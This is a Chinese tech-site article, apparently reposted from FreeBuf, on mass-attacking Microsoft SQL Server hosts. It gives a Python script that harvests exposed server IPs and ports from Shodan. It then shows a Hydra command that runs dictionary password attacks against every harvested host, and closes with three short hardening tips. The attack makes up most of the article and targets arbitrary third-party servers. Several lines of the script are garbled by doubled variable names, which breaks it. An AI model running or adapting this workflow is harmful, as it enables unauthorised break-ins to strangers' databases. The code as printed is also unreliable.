51CTO首页
AI.x社区
博客
学堂
精品班
软考社区
免费课
企业培训
鸿蒙开发者社区
WOT技术大会
IT证书
公众号矩阵
移动端
短视频免费课程课程排行直播课软考学堂
全部课程厂商认证IT技术24年11月软考PMP项目管理免费题库
在线学习
文章资源问答课堂专栏直播
51CTO
鸿蒙开发者社区
51CTO技术栈
51CTO官微
51CTO学堂
51CTO博客
CTO训练营
鸿蒙开发者社区订阅号
51CTO软考
51CTO学堂APP
51CTO学堂企业版APP
鸿蒙开发者社区视频号
51CTO软考题库
账号设置 退出

基于ShodanPython库的批量攻击实践

作者:gaearrow
安全
本文以MSSQL服务器为切入点,以解决批量目标发现为目标,介绍了一种基于Shodan Python库的攻击方法。

SQL Server的弱口令入侵案例层出不穷,利用工具也大量存在,本文以MSSQL服务器为切入点,以解决批量目标发现为目标,介绍了一种基于Shodan Python库的攻击方法。希望能给有类似需求的同学提供参考。

[[188971]]

一、基本思路

首先利用Shodan的Python库获取并实时处理MSSQL服务器IP及1434端口Banner,得到IP和MSSQL连接端口的组合列表;然后利用Hydra进行字典口令攻击。

SQL Server服务使用两个端口:TCP-1433、UDP-1434。其中1433用于供SQL Server对外提供服务,1434用于向请求者返回SQL Server使用了哪个TCP/IP端口。

—— 百度百科-1433端口

二、实现脚本

实现过程详见脚本中的注释

  1. # -- coding:utf-8 -- 
  2. # Python v2.7.10 
  3. # MSSQL.py 
  4. # Written by Gaearrow 
  5.  
  6. import shodan 
  7. import sys 
  8.  
  9. # API_KEY 
  10. API_KEY = "YOUR_API_KEY" 
  11. query = "product:\"Microsoft SQL Server\"" 
  12.  
  13. # 处理输入 
  14. if len(sys.argv) != 3: 
  15.     print  
  16.     print 'Usage: MSSQL.py <page start:1,2...> <page end:1,2...>
  17.     sys.exit(1) 
  18. pagestart = int(sys.argv[1]) 
  19. pageend = int(sys.argv[2]) 
  20.  
  21. try: 
  22.     # 初始化输出文件 
  23.     ofilename = 'page'+str(pagestart)+'to'+str(pageend) 
  24.     ofilesrc = ofilename+'_src.txt' 
  25.     ofileip = ofilename+'_ip.txt' 
  26.     fsrc = open(ofilesrc,'w') 
  27.     fip = open(ofileip,'w') 
  28.  
  29.     # 统计变量 
  30.     numofport = 0 
  31.     numofnoport = 0 
  32.     rstlist = 0 
  33.      
  34.     # 逐页检索 
  35.     api = shodan.Shodan(API_KEY) 
  36.     rsttotal = api.count(query) 
  37.     maxpage = (rsttotal['total']+99)/100 
  38.     if pageend > maxpage: 
  39.         pageend = maxpage 
  40.     for page in range(pagestart,pageend+1): 
  41.         result = api.search(query,page) 
  42.         for mssql in result['matches']: 
  43.             # 从Banner中解析MSSQL的连接端口 
  44.             ## 删除换行 
  45.             ip = mssql['ip_str'].strip('\n') 
  46.             ## Ignore IPv6 
  47.             if len(ip) > 15: 
  48.                 continue 
  49.             ## 跳过特殊字符 
  50.             banner = mssql['data'][3:] 
  51.             ## 检查Banner 
  52.             if banner.find('ServerName') < 0: 
  53.                 continue 
  54.             pos = banner.find('tcp;') 
  55.             if pos > 0: 
  56.                 strlist = banner[pos:].split(';') 
  57.                 if strlist[1].find('np') < 0: 
  58.                     ### tcp;1234;np;.. 
  59.                     ipipport = ip+':'+strlist[1] 
  60.                     numofportnumofport = numofport + 1 
  61.                 else: 
  62.                     ### tcp;np;.. 
  63.                     ipipport = ip+":1433" 
  64.                     numofnoportnumofnoport = numofnoport + 1 
  65.             else: 
  66.                 ### no 'tcp;' 
  67.                 ipipport = ip+":1433" 
  68.                 numofnoportnumofnoport = numofnoport + 1 
  69.  
  70.             print >>fip,ipport 
  71.             print >>fsrc,mssql['ip_str'] 
  72.             print >>fsrc,mssql['data'][3:] 
  73.             rstlistrstlist = rstlist + 1 
  74.  
  75.     # 打印统计信息 
  76.     print >>fsrc,'===================================' 
  77.     print >>fsrc,'Shodan Summary Information' 
  78.     print >>fsrc,'Query : ', query 
  79.     print >>fsrc,'Total Results : ', rsttotal['total'] 
  80.     print >>fsrc,'List  Results : ', rstlist 
  81.     print >>fsrc,'Page  Start   : ', pagestart 
  82.     print >>fsrc,'Page  End     : ', pageend 
  83.     print >>fsrc,'Port  Assigned   : ',numofport 
  84.     print >>fsrc,'Port  Unassigned : ',numofnoport 
  85.     print >>fsrc,'===================================' 
  86.  
  87. except Exception as e: 
  88.     print 'Error: %s' % e 
  89.     sys.exit(1) 
  90.  
  91. fsrc.close() 
  92. fip.close() 

三、执行示例

1. 执行环境

  1. root@kali2:~/app/mssqlnew# uname -a 
  2. Linux kali2 4.0.0-kali1-686-pae #1 SMP Debian 4.0.4-1+kali2 (2015-06-03) i686 GNU/Linux 
  3. root@kali2:~/app/mssqlnew# python -V 
  4. Python 2.7.9 

2. 获取地址端口组合列表

  1. root@kali2:~/app/mssqlnew# python MSSQL.py 1 10 

page1to10_src.txt

src.png

summary.png

page1to10_ip.txt

iplist.png

3. hydra字典攻击

攻击耗时及成功率与用户、口令字典有紧密关系,网络带宽也影响速度。

root@kali2:~/app/mssqlnew# hydra -L sqluser.dic -P sqlpass.dic -t 30 -M page1to10_ip.txt mssql

四、安全建议

  • 设置MSSQL仅限本地连接
  • 修改MSSQL的默认连接端口
  • 分级配置各类数据库用户权限
责任编辑:赵宁宁 来源: FreeBuf
攻击Shodan Python数据库
相关推荐
挫败BEC攻击优秀实践
为挫败BEC攻击,企业必须关注黄金三角:人员、过程和技术的协调统一。以下就是缓解BEC攻击应遵循的优秀实践。

2021-08-17 15:00:10

BEC攻击网络攻击邮件安全
浅谈基于JavaScriptDDOS攻击
CloudFlare通过对上百万个网站进行防护,总结出最古老、最普遍的攻击非DDoS攻击莫属。在传统的DDoS攻击中,攻击者会控制大量的傀儡机,然后向目标服务器发送大量请求,阻止合法用户访问网站。

2015-05-06 10:02:26

基于kubernetesdocker集群实践
本文作者和大家分享了基于kubernetes实现了简单的docker应用集群系统的实践经验。在这个系统中,实现了应用的自动部署、动态扩容、节点切换、健康检查、AB式版本更新等功能。

2015-07-17 10:25:43

kubernetesDocker集群系统
基于 KubeSphere 分级管理实践
在KubeSphere中,资源可以在租户之间共享,根据分配的不同角色,可以对各种资源进行操作。

2022-08-08 07:05:36

KubeSphere分级管理
基于约束条件SQL攻击
在本文中,作者为读者介绍另一种与SQL数据库相关的漏洞,虽然它的危害性与SQL注入不相上下,但目前却很少为人所知。接下来,我将为读者详细展示这种攻击手法,以及相应的防御策略。

2017-01-19 16:09:32

基于USB攻击向量总结
本文,我将主要通过上图的分类方式来探讨针对USB的攻击向量问题。最上层涉及到更多关于人类应用、业务的基本交互场景。

2020-03-13 09:33:37

USB攻击向量移动安全
防止零日攻击高级优秀实践
本文介绍了针对零日攻击的基本与高级防御措施,其中深入讨论了实施补丁管理、使用WindowsDefender、零信任、XDR、NGAV、以及事件响应计划。

2023-02-06 08:00:00

Web攻击检测机器学习深度实践
传统的WAF,依赖规则和黑白名单的方式来进行Web攻击检测。该方式过分依赖安全人员的知识广度,针对未知攻击类型无可奈何。

2019-06-25 10:09:42

Web攻击机器学习网络攻击
基于Web攻击方式发现并攻击物联网设备
在本文中,我们讨论了Princeton(普林斯顿大学)和UCBerkeley(加州大学伯克利分校)关于基于web的方式攻击物联网设备的研究,这些攻击会导致设备被黑客发现、攻击和接管。研究于2018年8月发表。

2019-01-09 09:34:22

基于 AI 篡改网络攻击来了
AI换脸余波未褪,AI换声进行电话诈骗的戏码竟也成真了!不得不说,现在确实已经很难区分出利用深度伪造(deepfake)技术制作的假文本、假视频。而近日,这种现象似乎又延伸到了假语音领域——一家公司就因为近期发生的一起语音欺诈案件损失了20万英镑(合约24.3万美元)。

2019-09-05 19:05:16

基于图数据知识图谱存储技术及实践
创邻科技是一家致力于分布式原生图技术的公司,从2016年成立以来,一直在图存储和图计算领域深耕。创邻的图数据库产品Galaxybase已经为银行、电力、公安、互联网等行业的多家头部客户提供服务。本文将分享基于图数据库的知识图谱存储技术及实践。

2023-05-22 09:18:04

SmartCloud Entry 基于 VMware 最佳实践
随着虚拟化技术的迅猛发展,众多商业公司及开源组织都推出了针对不同平台的Hypervisor层实现,例如:IBM公司的PowerVM,VMware公司的ESXi,Redhat的KVM等。与此同时,业界也涌现出了众多基于这些Hypervisor的云计算解决方案。SmartCloudEntry是IBM公司开发的一款基于云计算基础架构及服务层的轻量级解决方案,其对PowerVM、VMware和KVM虚拟化层都有着很好...

2012-12-10 11:05:11

IBMdW
基于 Docker 微服务架构实践
基于Docker的容器技术是在2015年的时候开始接触的,两年多的时间,作为一名Docker的DevOps,也见证了Docker的技术体系的快速发展。本文主要是结合在公司搭建的微服务架构的实践过程,做一个简单的总结。

2018-04-20 10:38:25

中小团队基于DockerDevOps实践
笔者所在的技术团队负责了数十个项目的开发和维护工作,每个项目都至少有dev、qa、hidden、product四个环境,数百台机器,在各个系统之间疲于奔命,解决各种琐碎的问题,如何从这些琐碎的事情中解放出来devops成了我们不二的选择。

2018-07-05 13:35:04

DockerDevops开发
基于SDN/NFV云安全实践
SDN(软件定义网络)灵活的流量调度能力和开放的可编程能力,结合NFV(网络功能虚拟化)的网络功能管理和服务编排,构建一个完整的、开放的虚拟化网络平台。

2017-12-21 15:01:42

基于iOSCharles抓包实践
在应用开发过程中,通过抓包调试服务端接口的场景时常出现。Charles和Wireshark是开发过程中最常用的两款软件。那么今天,让我们以iOS为例,聊一聊Charles抓包。

2019-03-25 22:20:39

iOSCharles抓包
利用SIEM进行高级攻击检测最佳实践
SIEM在攻击检测中发挥着重要作用。但要成功检测出各种攻击类型,企业必须建立一套策略来寻找其环境中的攻击情况和指标,并持续监控这些情况。

2014-02-25 13:38:17

基于 RxJs 前端数据层实践
近来前端社区有越来越多的人开始关注前端数据层的设计。DaoCloud也遇到了这方面的问题。我们调研了很多种解决方案,最终采用RxJs来设计一套数据层

2017-09-01 18:27:36

前端 RxJs数据层
基于Spark数据分析实践
本文主要分析了SparkRDD以及RDD作为开发的不足之处,介绍了SparkSQL对已有的常见数据系统的操作方法,以及重点介绍了普元在众多数据开发项目中总结的基于SparkSQLFlow开发框架。

2019-06-19 16:01:14

Spark数据分析SparkSQL
基于Redis实现消息队列实践
不支持消费者确认机制,稳定性不能得到保证,例如当消费者获取到消息之后,还没来得及执行就宕机了。因为没有消费者确认机制,Redis就会误以为消费者已经执行了,因此就不会重复发送未被正常消费的消息了,这样整体的Redis稳定性就被没有办法得到保障了。

2023-12-30 13:47:48

Redis消息队列机制
点赞
收藏

51CTO技术栈公众号

业务
速览
在线客服